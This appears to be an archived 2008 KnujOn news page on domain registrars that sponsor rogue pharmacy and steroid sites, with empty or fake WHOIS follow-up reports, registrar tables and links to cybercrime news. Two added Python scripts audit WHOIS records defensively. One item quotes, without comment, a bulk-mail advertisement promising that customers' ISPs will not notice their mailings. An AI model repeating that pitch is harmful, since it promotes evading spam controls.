But online threats are still of great concern, according to our research and national survey of 2,071 online households conducted this past spring by the Consumer Reports National Research Center.
(consumerreports.org)
ID leaks: A surprising source is your government at work (consumerreports.org)
Insidious new threats (consumerreports.org)
7 online blunders: These common mistakes can ruin your computer or invite identity theft (consumerreports.org)
Cyber Insecurity Guide (consumerreports.org)
August 18, 2008
If one were to look at the Internic directory it would appear that there are 529 ICANN accredited registrars in the United States. Having this many different companies would give the appearance that there is diversity and competition in the domain marketplace. However, that appearance is misleading. Four companies control 318 accreditations: eNom (116), Directi/PDR (47), Dotster (51), and Snapnames (104). Another 122 accreditations are owned by only 23 companies. What is left are 136 registrars that appear independent. So, that would make 163 the realistic count, not 529. Considering this data, the U.S. Registrar industry looks less like an open and competitive market and more like a cartel.
Full report
August 17, 2008
Once again we have recorded a case where a registrar is not returning full Whois records in follow-up reports to ICANN. These follow-up reports are supposed to contain the current owner information; instead, Xin Net is returning no data. This seems to be a pattern at some providers and particularly for illicit sites. The domains below include garden-variety fake pharmacies, knockoff product sites, and one site selling "marijuana substitutes."
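The gap in these follow-up reports is mechanical and easy to check for: each extract has an empty "REGISTRAR WHOIS:" section, and the only data present is the registry's thin record (registrar, name servers, status, dates), which never names the registrant. The following Python script is an added example, not code from the page or from KnujOn. It parses extracts in exactly this layout, separates the registrar section from the registry section, and reports which registrant fields each record lacks. Two of the embedded records are copied from the page; the third, EXAMPLE-GOOD.COM, is constructed here to show what a complete record looks like. The labels in REGISTRANT_FIELDS are an assumption about what a registrar's own WHOIS normally carries; adjust them to the registrar being audited.

```python
"""Audit registrar follow-up WHOIS extracts for missing registrant data.

Added example, not code from the original page. Two records below are copied
from the page; EXAMPLE-GOOD.COM is constructed to show a complete record.
REGISTRANT_FIELDS is an assumption about registrar-level field labels.
"""
import re

# Fields a registrar's own (thick) WHOIS record is expected to carry.
# Assumption for this example: labels vary between registrars.
REGISTRANT_FIELDS = (
    "Registrant Name",
    "Registrant Organization",
    "Registrant Email",
    "Admin Email",
)

SECTION_HEADERS = {"REGISTRAR WHOIS:": "registrar", "REGISTRY WHOIS:": "registry"}
RECORD_START = re.compile(r"^WHOIS DATA AS OF (\S+ \S+)$")
KEY_VALUE = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s*(.*)$")

# Constructed sample: the first two records reproduce the page's extracts,
# the third is a made-up record that does carry registrant data.
SAMPLE_REPORT = """\
WHOIS DATA AS OF 2008/08/06 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: VNSOEVJSOE.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.NS-EARTHLING.COM
Name Server: NS2.NS-EARTHLING.COM
Status: ok
Updated Date: 07-feb-2008
Creation Date: 07-feb-2008
Expiration Date: 07-feb-2009
WHOIS DATA AS OF 2008/07/11 01:15:01
REGISTRAR WHOIS:
Whois Server Version 2.0
Domain Name: THEBUDSHOP.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.THEBUDSHOP.NET
Name Server: NS2.THEBUDSHOP.NET
Status: ok
Updated Date: 19-jun-2008
Creation Date: 30-oct-2007
Expiration Date: 30-oct-2008
WHOIS DATA AS OF 2008/08/06 01:15:01
REGISTRAR WHOIS:
Domain Name: EXAMPLE-GOOD.COM
Registrar: EXAMPLE REGISTRAR INC
Registrant Name: Jane Doe
Registrant Organization: Example Org
Registrant Email: jane@example.com
Admin Email: admin@example.com
REGISTRY WHOIS:
Domain Name: EXAMPLE-GOOD.COM
Registrar: EXAMPLE REGISTRAR INC
Status: ok
"""


def parse_report(text):
    """Split a report into records, each holding a 'registrar' and a
    'registry' dict of field -> list of values (fields may repeat, e.g.
    Name Server). A record with no REGISTRY WHOIS header keeps its data under
    the registrar section, which is how the page's extracts actually read."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        start = RECORD_START.match(line)
        if start:
            current = {"as_of": start.group(1), "registrar": {}, "registry": {}}
            records.append(current)
            section = None
            continue
        if current is None:
            continue
        if line in SECTION_HEADERS:  # check before KEY_VALUE: headers end in ':'
            section = SECTION_HEADERS[line]
            continue
        kv = KEY_VALUE.match(line)
        if kv and section is not None:
            current[section].setdefault(kv.group(1), []).append(kv.group(2))
    return records


def domain_of(record):
    """Domain name of a record, preferring the registry section."""
    for section in ("registry", "registrar"):
        names = record[section].get("Domain Name")
        if names:
            return names[0].upper()
    return None


def missing_registrant_fields(record):
    """Registrant fields absent (or empty) in the registrar section."""
    present = record["registrar"]
    return [f for f in REGISTRANT_FIELDS if not any(present.get(f, []))]


def audit(text):
    """Map each domain in a report to the registrant fields its registrar
    failed to supply; an empty list means the record is complete."""
    return {domain_of(r): missing_registrant_fields(r) for r in parse_report(text)}


if __name__ == "__main__":
    for domain, missing in audit(SAMPLE_REPORT).items():
        verdict = "OK" if not missing else "NO REGISTRANT DATA: " + ", ".join(missing)
        print(f"{domain:20s} {verdict}")
```

Run against a whole batch of follow-up reports, the audit gives a per-registrar count of empty registrar sections, which is the pattern the paragraph above describes; a record whose registrar section contains only registry-style fields (Whois Server, Referral URL) and no registrant labels is the tell.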
Report from Registrar to ICANN (left column of the original table); Current Content (right column, screenshots of the live sites, not reproduced)

WHOIS DATA AS OF 2008/08/06 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: VNSOEVJSOE.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.NS-EARTHLING.COM
Name Server: NS2.NS-EARTHLING.COM
Status: ok
Updated Date: 07-feb-2008
Creation Date: 07-feb-2008
Expiration Date: 07-feb-2009

WHOIS DATA AS OF 2008/07/11 01:15:01
REGISTRAR WHOIS:
Whois Server Version 2.0
Domain Name: THEBUDSHOP.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.THEBUDSHOP.NET
Name Server: NS2.THEBUDSHOP.NET
Status: ok
Updated Date: 19-jun-2008
Creation Date: 30-oct-2007
Expiration Date: 30-oct-2008

WHOIS DATA AS OF 2008/07/01 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: RELIABLESUPERBLY.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: S1.PWRDNSONE.BIZ
Name Server: S1.PWRDNSTWO.BIZ
Name Server: S2.PWRDNSONE.BIZ
Name Server: S2.PWRDNSTWO.BIZ
Status: ok
Updated Date: 25-may-2008
Creation Date: 20-jan-2008
Expiration Date: 20-jan-2009

REGISTRAR WHOIS:
Whois Server Version 2.0
Domain Name: LEASIDEHOME.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.BARGAINPILLSPHARMACY.COM
Name Server: NS2.BARGAINPILLSPHARMACY.COM
Status: ok
Updated Date: 11-mar-2008
Creation Date: 10-mar-2008
Expiration Date: 10-mar-2009

WHOIS DATA AS OF 2008/08/06 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: GOOVEAEAG.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.NS-EARTHLING.COM
Name Server: NS2.NS-EARTHLING.COM
Status: ok
Updated Date: 07-feb-2008
Creation Date: 07-feb-2008
Expiration Date: 07-feb-2009

WHOIS DATA AS OF 2008/08/01 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: GEHRUEELS.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.VOBIUTE.COM
Name Server: NS2.VOBIUTE.COM
Status: ok
Updated Date: 18-feb-2008
Creation Date: 18-feb-2008
Expiration Date: 18-feb-2009
| |
|
August 14, 2008
Remember those Websites sponsored by U.S. Internet domain registrars that were recently exposed for illegally selling steroids? These sites are still pushing the drugs online, according to the anti-fraud watchdog groups that first discovered them. (See Hundreds of Websites Outed for Illegally Selling Steroids.)
The domain registrars hosting these sites as well as the Internet Corporation for Assigned Names and Numbers (ICANN), say their hands are tied when it comes to shutting down the steroid-selling sites, which KnujOn and LegitScript.com outed and reported to the registrars and ICANN last month.
But KnujOn and LegitScript argue that shutting down these sites should be a no-brainer.
"In the vast majority of Websites we identified, it was plain that [they] were offering these drugs, and doing so in a way that violates U.S. federal law. Frankly, one doesn't have to be an expert to see what these Websites are doing," says John Horton, president of LegitScript.
“We also received -- and in some cases, presented to the registrars -- information from the Website operator with information about the drugs (including photos) and instructions for payment," Horton says. "We think that these sites are fairly straightforward to identify in many cases, and the remedy -- termination -- is equally clear.”
(darkreading.com)
Prescription drug spammers are bankrolling botnet's growth, IronPort study says (darkreading.com)
LegitScript/Knujon Steroids Report
August 11, 2008
One of the MIT computer hackers who uncovered flaws in the CharlieCard system that would let passengers swipe free rides said he and his classmates offered to show T officials how to fix the problem, but instead were hauled into court and barred from speaking about their work.
“We made first contact,” said Zack Anderson, 21, a Los Angeles native, who majors in electronic engineering and computer science. “We wanted to let them know what we found and we wanted to tell them some ideas we had on how they could fix that system ... We felt like the issue was resolved. That was verbally affirmed in a Monday meeting. Then Friday we find out there’s a federal lawsuit against us.”
On Saturday morning, federal Judge Douglas Woodlock granted the MBTA a restraining order that blocked Anderson and classmates R.J. Ryan and Alessandro Chiesa from presenting their A-graded paper at DEFCON 16, an annual hackers conference in Las Vegas.
(bostonherald.com)
August 7, 2008
A website infected with malware is detected every five seconds - a dramatic
increase over the last 12 months due to the rise in SQL injection attacks.
Websites poisoned with malware capable of infecting visitors' machines are
being discovered at a rate of 16,173 per day - three times faster than in
2007.
(silicon.com)
August 6, 2008
A ring of identity thieves that targeted U.S. retailers used sophisticated and multifaceted attacks to steal more than 40 million credit and debit card numbers from TJX, OfficeMax, Barnes & Noble and other companies, according to court documents.
The attacks cost retailers and credit card companies tens of millions of dollars.
Members of the ID theft conspiracy used so-called wardriving techniques to find holes in wireless networks operated by retail stores. Once inside the networks, the thieves located and stole credit card transaction information stored on the retailers' networks, according to court documents.
(networkworld.com)
August 5, 2008
KnujOn has found at least 19 rogue pharmacy domains, sponsored through
DIRECT INFORMATION PVT LTD D/B/A PUBLICDOMAINREGISTRY.COM (PDR), which were
reported by the Registrar as Suspended but are back in operation with the same content,
at the same nameservers. The nameserver, canadamenrx.com, is also sponsored by PDR and
is itself an unlicensed pharmacy site. This is an example of a practice we have seen all
too frequently, where Internet companies remove sites temporarily for reported
policy violations only to restore them shortly afterwards. In some cases the domains
move from one Registrar to another (occasionally to a second Registrar with the same
parent company), but this is a situation where the domains went right back where they
were before. DIRECT INFO/PUBLICDOMAINREGISTRY was previously rated the 9th Worst Registrar in
terms of sponsoring spam sites. Below, for each domain, is a copy of the
suspension report sent by the Registrar to ICANN in May, paired with the site content as of August 3, 2008.
Report from Registrar to ICANN (one record per domain):

Domain Name: AMERICANPERFECTMEDS.COM
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000

Domain Name: BUYAMERICANSTOREDRUGS.COM
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000

Domain Name: EWORLDTRUSTEDDRUGSTORE.COM
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000

Domain Name: NEWDIRECTDRUGSTORE.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000

Domain Name: THEWORLDTRUSTTABLET.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000

Domain Name: USAFASTPILLS.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000

Domain Name: YOURTORONTOMENPHARMACY.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
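The check a reviewer of these follow-up reports would want, as an added example that is not KnujOn's own tooling: it parses a WHOIS record and flags whether the registrar returned only registry-level fields with no registrant block, as in the Xin Net records of August 17, or a suspension placeholder in place of the registrant, as in the PDR records above. The sample records, domain names, registrar name and name servers are constructed.

```python
"""Triage WHOIS follow-up records by how much owner data they actually carry.
Added example, not KnujOn's tooling: it flags the two patterns shown in the
August 17 and August 5 items (registry-level fields only, with no registrant
block; and a suspension placeholder returned in place of the registrant)."""
import re

# Constructed sample records (domain names, registrar and name servers are
# made up), modelled on the reports reproduced above.
REGISTRY_ONLY = """\
WHOIS DATA AS OF 2008/08/06 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Domain Name: EXAMPLE-ONE.COM
Registrar: EXAMPLE REGISTRAR CORPORATION
Name Server: NS1.EXAMPLE-DNS.INVALID
Status: ok
Creation Date: 07-feb-2008
Expiration Date: 07-feb-2009
"""

PLACEHOLDER = """\
Domain Name: EXAMPLE-TWO.COM
Registrant:
Registrar False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
US
Tel. +00.0000
"""

COMPLETE = """\
Domain Name: EXAMPLE-THREE.COM
Registrar: EXAMPLE REGISTRAR CORPORATION
Registrant:
Jane Example
12 Sample Street
US
Name Server: NS1.EXAMPLE-DNS.INVALID
Status: ok
"""

# "Key: value" lines. Keys are letters/spaces only, so a timestamp line such
# as "WHOIS DATA AS OF 2008/08/06 01:15:01" is not mistaken for a field.
KEY_VALUE = re.compile(r"^([A-Za-z][A-Za-z ]*):\s*(.*)$")

# Phrases from the suspension placeholders returned instead of owner data.
PLACEHOLDER_MARKERS = ("suspended account", "inaccurate whois",
                       "suspended-domain.com", "this domain is suspended")


def parse_record(text):
    """Return (fields, registrant_lines): fields maps a key to all values seen;
    registrant_lines is the free text after a bare 'Registrant:' header."""
    fields = {}
    registrant = []
    in_registrant = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KEY_VALUE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            if key.lower() == "registrant" and not value:
                in_registrant = True  # free-text contact block follows
                continue
            in_registrant = False     # any other field ends that block
            fields.setdefault(key, []).append(value)
        elif in_registrant:
            registrant.append(line)
    return fields, registrant


def classify(text):
    """Return 'complete', 'placeholder', 'registry-only' or 'empty'."""
    fields, registrant = parse_record(text)
    if "Domain Name" not in fields:
        return "empty"
    if not registrant:
        # Only registry-level data (registrar, name servers, dates) came
        # back: the registrar supplied no owner contact information at all.
        return "registry-only"
    blob = " ".join(registrant).lower()
    if any(marker in blob for marker in PLACEHOLDER_MARKERS):
        return "placeholder"
    return "complete"


def triage(records):
    """Map lower-cased domain -> verdict, so non-'complete' records stand out."""
    result = {}
    for text in records:
        fields, _ = parse_record(text)
        name = fields.get("Domain Name", ["<unknown>"])[0].lower()
        result[name] = classify(text)
    return result
```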
Full List
americanperfectmeds.com
buyamericanstoredrugs.com
buyglobaldeliverytablet.com
buystorerx.com
canadamenrx.com
canadastorepill.net
canadastoretablet.net
eshoppill.net
eusastoredrugs.net
eworldtrusteddrugstore.com
fortorontomendrugs.com
gettopdrugstore.net
hotglobaltrustmeds.com
newdirectdrugstore.net
theplanetpill.net
theworldtrusttablet.net
usafastpills.net
webcanadafastcapsules.com
yourtorontomenpharmacy.net
August 4, 2008
A KnujOn review of 7900 recent follow-up reports found
340 were active after being reported to ICANN as "suspended" or "deleted." Some were still conducting the same illicit commerce
uninterrupted while being listed as suspended. While these complaints were driven by false Whois registrations, some registrars
went as far as to put "Suspended for spamming" into the status fields; KnujOn nevertheless found these domain names were still
open for business.
| Registrar | Count NOT Suspended |
| afternic, inc | 8 |
| allearthdomains.com llc | 1 |
| annulet, inc | 9 |
| answerable.com (i) pvt. ltd. | 2 |
| best registration services, inc | 1 |
| chocolatecovereddomains, llc | 1 |
| computer services langenbach gmbh dba joker.com | 3 |
| direct information pvt ltd d/b/a publicdomainregistry.com | 70 |
| domainamania.com llc | 2 |
| domaindiscover | 91 |
| domainpeople, inc. | 2 |
| domainraker.net llc | 1 |
| domainroyale.com llc | 1 |
| domainsoftheday.net llc | 1 |
| domainsouffle.com llc | 1 |
| domainstream.ca inc. | 2 |
| dotarai co,. ltd. | 8 |
| dotster, inc. | 2 |
| dstr acquisition vii, llc | 13 |
| eunameflood.com llc | 1 |
| fabulous.com pty ltd. | 3 |
| gmo internet, inc. dba onamae.com and discount-domain.com | 2 |
| hichina web solutions (hong kong) limited | 11 |
| innerwise, inc. d/b/a itsyourdomain.com | 5 |
| intercosmos media group, inc. d/b/a directnic.com | 1 |
| moniker online services, inc. | 9 |
| name perfections, inc. | 1 |
| namearsenal.com llc | 1 |
| namecroc.com llc | 1 |
| nameemperor.com llc | 1 |
| namevolcano.com llc | 2 |
| octopusdomains.net llc | 1 |
| oregoneu.com llc | 1 |
| oregonurls.com llc | 1 |
| pdxprivatenames.com llc | 2 |
| red register, inc. | 2 |
| registration technologies, inc. | 53 |
| savemorenames.com inc | 4 |
| savethename.com llc | 1 |
| wild west domains, inc. | 1 |
| yesnic co. ltd. | 1 |
| youdomain.com llc | 1 |
July 30, 2008
Be on the lookout for spam e-mail spreading malicious software (malware) which mentions “F.B.I. vs. facebook.” The e-mail directs the recipient to click on a link to view an article about the FBI and Facebook. Once the user clicks on the link, the “Storm Worm” malware is downloaded to the Internet-connected device, causing it to become infected with the virus and part of the Storm Worm botnet. A botnet is a network of compromised machines under the control of a single user. Botnets are typically set up to facilitate criminal activity such as spam e-mail, identity theft, denial of service attacks, and spreading malware to other machines on the Internet.
The Storm Worm virus has capitalized on various holidays and fictitious world events in the last year by sending millions of e-mails advertising an e-card link within the text of the spam e-mail.
(myfoxtwincities.com)
July 28, 2008
Safe Mail Services is the leader in email marketing for small businesses. Web based server allows members to blast over 3 Million emails per day. All recipients are double opt-in making Safe Mail Services 100% SPAM law compliant. Recipient database is filled with prospects who have asked to be included in safe-list, so you know your ad will reach real customers. All blasts go out from Safe Mail Services email server which members access through login from this website. You will not be taken to a 3rd party service like many of Safe Mail Services competitors. And since all blasts are done by Safe Mail Services server your ISP will have no idea you are even using an email service. Are you tired of promoting your product with no results? How would you like to wake up each morning only to find your email box filled with orders? That's where we come in. Our email list will allow your business to grow day after day, week after week and month after month without any additional fees or charges.
(ehow.com)
July 27, 2008
A Romanian man pleaded guilty Tuesday to a federal fraud charge for his role in setting up fake Web sites in order to steal credit and debit card details.
Ovidiu-Ionut Nicola-Roman, 22, could also face a US$250,000 fine, according to the U.S. Department of Justice (DOJ). Nicola-Roman pleaded guilty to one count of conspiracy to commit fraud.
Nicola-Roman is one of 38 people of several nationalities charged in May with running a cybercrime ring centered around spam and phishing. In just one incident, the crew sent 1.3 million spam messages luring people to visit Web sites they had built to collect financial details.
(pcworld.com)
July 26, 2008
A new report by two Internet watchdog groups has identified hundreds of Web sites that illegally sell anabolic steroids without prescriptions or verifying the age of customers. The report, Pumped Up on the Internet, was issued by the watchdog groups LegitScript.com, which studies online pharmacies, and KnujOn.com, which investigates senders of spam e-mail. It focused on 156 sites that have registered their domain names through American companies but send the steroids from abroad. The report said that while federal drug authorities might lack jurisdiction abroad, the eight American domain registry companies used by these sellers had the legal right and obligation to terminate the rogue pharmacy sites.
(nytimes.com)
July 25, 2008
OTTAWA - Don't take the bait is the message Carleton University has for
campus e-mail users after a "phishing" expedition caused a huge e-mail
traffic jam earlier this week. "Phishing" occurs when a person receives
an e-mail asking them to hand over personal information, such as passwords
for e-mail accounts. If the person responds with the requested
information, it can be used for nefarious purposes, such as sending out
thousands of spam e-mails. "It's like giving someone the key to your
house," said Ralph Michaelis, Carleton's chief information officer. The
school discovered on Monday that access had been gained through one
student account. That allowed hackers to send out tens of thousands of
e-mails, effectively jamming the system. The problem was resolved within
hours, but it took until Wednesday for the congestion to clear, Mr.
Michaelis said...(canada.com)
July 24, 2008
From the penthouse to the Big House (theregister.co.uk)
July 23, 2008
Registrars turn blind eye to sites selling illegal steroids: Next time you see websites brazenly pushing anabolic steroids, thank GoDaddy, Dynadot and a half-dozen other US-based registrars, which allow them to operate even though they're illegal, claims a new report.
Released Monday, the report catalogs 156 websites offering steroids without a prescription or verifying that the would-be buyer is over 18 years old. Such practices are a violation of laws in the US and in many other countries and a violation of the terms of service the registrars impose on their customers. All eight of the registrars are, concludes the report, turning a blind eye to the practice.
(theregister.co.uk)
Report aims to decrease illegal steroid sales online: At least 156 Web sites selling anabolic steroids without the necessary prescription are run through domain name registrars in the U.S., according to a report released Monday.
(mywesttexas.com)
The steroid-selling sites aren’t your typical phony online pharmacies. “With general RX sites, there is a lot of variety. Some are merely stealing credit card numbers, others ship knockoff or counterfeit drugs, and others sell diverted market product which is the real thing but may be expired, under dosage, or rerouted from its original destination.
“With the steroid sites, there is much more involvement in the trade. The sites are more personalized and not as cold as the fake pill sites,” Bruen says. “If you look through some of the steroid forums out there, people complain about lots of fake supplements on the Internet. The sites we're looking at claim to offer the real thing and no ‘bad’ versions.”
(darkreading.com)
Easy for youth to get anabolic steroids
(upi.com)
Steroid sales still flourishing on the Web
(weblog.infoworld.com)
Kids at Risk: Report Identifies 150 Websites Selling Anabolic Steroids
(marketwatch.com)
Report: U.S. registrars won't take down illegal steroid sites
(stopbadware.org)
The report also found that every one of the needle-pushing URLs involved were registered with eight domain name registrars, all of whom are located in the United States.
In most cases, the parties behind the sites have used anonymous registration services -- services that many security researchers have named as a root cause of the continued proliferation of online cyber-crime. In all the other cases involved, the registered parties are located outside of U.S. borders.
(eweek.com)
July 22, 2008
Parava Networks, Inc. dba 10-Domains.com was one of the eight registrars cited in Knujon and LegitScript's
Steroid Report, and our letter to them was returned by
the post office as undeliverable. This is quite shocking in light of the recent scandal involving
67 Registrars that were in undisclosed locations. The internic.org directory of Registrar addresses has
been updated since the Knujon disclosure. But now we have a new problem: the provided addresses are not real.
So what we have here is a Registrar that sponsors steroid-related sites and is also apparently unresponsive and unaccountable. The issue
has been referred to ICANN.
July 21, 2008
Networks of steroid dealing domains are sponsored through U.S.-based
companies who refuse to shut them down even after being notified.
LegitScript.com and Knujon.com have worked together to develop a report
concerning extensive steroid distribution networks online. Steroids
designated by the Department of Justice as “Schedule 3 Substances”
were found at the 156 web domains listed in this report. The easy
availability of illicit substances through these domains is shocking.
Even more shocking is the lack of cooperation from the Registrars that
sponsor these sites. On July 1 we issued joint letters to eight
registrars: Abacus America, DSTR Acquisition VII, Dynadot.com, Everyones Internet,
eNom Inc (also cited in the Ten Worst Registrars Report), EstDomains Inc,
GoDaddy/Wild West, and Parava Networks Inc. In these letters we listed the websites, described the
banned substances offered at each, and detailed how these sites were
violating Internet policy, the Registrar’s own terms of service, and
the law. Only three Registrars responded, two declining to cooperate,
one stating they would look into it after several strong emails. A
letter to one Registrar, Parava Networks Inc, was returned by the Postal
Service as undeliverable, calling into question the general legitimacy
of this particular company.
While no one is accusing any of these Registrars of being actively
involved in the illicit distribution, it is a simple fact that none of
these sites would exist without the sponsorship of these Internet
companies. Some Registrars may feel their first obligation is to their
customers, but their real primary obligations are to the law and the
stability of the Internet registration system. Everyone who registers an
Internet domain is required to affirm that they “are not registering
the domain name for an unlawful purpose” and the Registrar is required
to ensure that this policy is enforced. For too long there has been a
false perception that the Internet is lawless, but it isn’t. The rules
are just not enforced and the stakeholders have been unaccountable.
Knujon and LegitScript feel that these Registrars also have a moral and
ethical responsibility to the public since the sale and distribution of
these illicit substances poses a grave health risk. These websites
purport to offer steroids to anyone without prescription or age
verification. It is our hope that in releasing this information public
awareness of the problem will increase.
The full Steroid Report is available here:
http://legitscript.com/Steroid%20Report.pdf
The press release is here:
legitscript.com/newsitems/show/10
A list of the Registrars, web domains in question, the substances
offered at each, and samples of the site content can be viewed here:
knujon.com/schedule3/dir.html
July 19, 2008
Almost everyone hates spam. The only people that don't hate it are the
ones that make vast amounts of money from sending it. The profits they
turn are so large that regardless of what spam fighters do, the amount of
spam keeps increasing. According to web security firm MessageLabs, spam
accounted for 81.5 percent of all e-mail traffic in June.
(arstechnica.com)
July 18, 2008
An examination of nearly 2.5 million Web pages at some of the Internet's
most popular and trusted sites turned up at least 128,000 links that could
be manipulated by fraudsters and virus writers to make online scams more
believable, a study released this month found. Scammers and phishers are
taking advantage of commonly used coding used in "redirects" to divert
traffic from reputable Web site to sites that could harbor malicious
software or phishing schemes...
(blog.washingtonpost.com)
July 17, 2008
Apparently in response to KnujOn's disclosure of 67 Registrars in Undisclosed Locations, ICANN has completed
a mass update of the Internic Registrar address directory. Oddly enough, 20 of the newly updated Registrars are all at the same address:
!!! BB Bulk, Inc. dba My Name Now
A Mountain Domains, Inc.
A. W. B. Trading, Inc.
AO Domains, Incorporated
Black Ice Domains, Inc.
Colorado Names Domains, Inc.
Emily Names Domains, Inc.
Get SLD, Inc.
Jetpack Domains, Inc.
JJH Investments, LLC
Lazy Dog Domains, Inc.
Oil Change Domains, Inc.
Pitchback Domains, Inc.
Slaphappy Domains, Inc.
Snowflake Domains, Inc.
Total Calories, Inc. dba Slim Names
Valley Apples, Inc.
Walela Brook, Inc.
WGB Registry, Inc.
White Socks Domains, Inc.
July 16, 2008
One minute behind bars for every junk mail
(theregister.co.uk)
July 15, 2008
LONDON (Reuters) - Prices charged by cybercriminals selling hacked bank
and credit card details have fallen sharply as the volume of data on offer
has soared, forcing them to look elsewhere to boost profit margins, a new
report says. Researchers for Finjan, a Web security firm, said the high
volumes traded had led to bank and credit card information becoming
"commoditised" - account details with PIN codes that once fetched $100 (50
pounds) or more each might now go for $10 or $20. In its latest quarterly
survey of Web trends, the California-based company said cybercrime had
evolved into "a major shadow economy ruled by business rules and logic
that closely mimics the legitimate business world". Finjan's Israel-based
chief technology officer, Yuval Ben-Itzhak, said in a telephone interview
that new types of stolen data were now commanding a premium, such as
patient healthcare information that can be used for insurance fraud or to
illicitly acquire and sell medicines. Other premium data includes
business information, company personnel files and intercepted commercial
emails...
(uk.reuters.com)
July 11, 2008
In the first case of its kind in the nation, a Wyoming man has been
charged with using modified peer-to-peer software to infect computers and
create "botnets" - armies of compromised computers numbering from
5,000 to 15,000 machines - that he exploited to obtain credit card and
banking information.
(usdoj.gov)
July 10, 2008
One month ago KnujOn reported
that 70 Registrars were in mystery locations: their addresses, phone numbers,
and even countries were not listed in the Internic/ICANN directory of accredited registrars. We reported this to
ICANN, and since then we have noted that 8 of the 70 have been updated, but 5 NEW registrars have been added with no location or country
information, changing the total to 67. 8 Registrars do not have their country of location listed. While it would be possible
to research these locations, the consumer should not have to. This is about building public trust and confidence. The full list
is below:
| !!! BB Bulk, Inc. dba My Name Now | No Change |
| # 1 DotMobi Registrar, Inc. | No Change |
| 10dencehispahard, S.L. (New) | No Address, No country |
| 123 Registration, Inc. | No Change |
| 35 Technology Co., Ltd. (New) | No Address, No country |
| 8068 Registrar, Inc | No Change |
| A Mountain Domains, Inc. | No Change |
| A. W. B. Trading, Inc. | No Change |
| Above, Inc. | No Change |
| Alisoft (Shanghai) Co., Ltd. | No Change |
| Anytime Sites, Inc. | No Change |
| AO Domains, Incorporated | No Change |
| Arctic Names, Inc. | No Change |
| Backslap Domains, Inc. | No Change |
| Best Bulk Register, Inc. | No Change |
| Black Ice Domains, Inc. | No Change |
| Bottle Domains, Inc. | No Change |
| China Springboard, Inc. (New) | No Address, No country |
| CodyCorp.com Inc. | No Change |
| Colorado Names Domains, Inc. | No Change |
| Commerce Island, Inc. | No Change |
| Cool Ocean, Inc. | No Change |
| Crisp Names, Inc. | No Change |
| Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com | Previously claimed to be in Beaverton, OR, changed country to India but still has no actual address listed |
| DNGLOBE LLC | No Change |
| Domain Jingles, Inc. | No Change |
| DomainCannon.com LLC | No Change |
| Domerati, Inc. | No Change |
| Dootall, Inc. | No Change |
| Dotregistrar, LLC | No Change |
| Dotted Ventures, Inc. | No Change |
| Dynamic Dolphin, Inc. | No Change |
| ELB Group Inc | No Change |
| Emily Names Domains, Inc. | No Change |
| European NIC Inc. | No Change |
| FBS Inc. | No Change |
| Freeparking Domain Registrars, Inc. | No Change |
| Get SLD, Inc. | No Change |
| Good Luck Internet Services PVT, LTD. | No Change |
| Hostalia USA, Inc. | No Change |
| Interdominios, Inc. | No Change |
| IPNIC, Inc | No Change |
| Jetpack Domains, Inc. | No Change |
| JJH Investments, LLC | No Change |
| Lazy Dog Domains, Inc | No Change |
| Naming Web, Inc. | No Change |
| NEEN.IT Inc., d/b/a namesprit.com | No Change |
| NetraCorp LLC dba Global Internet | No Change |
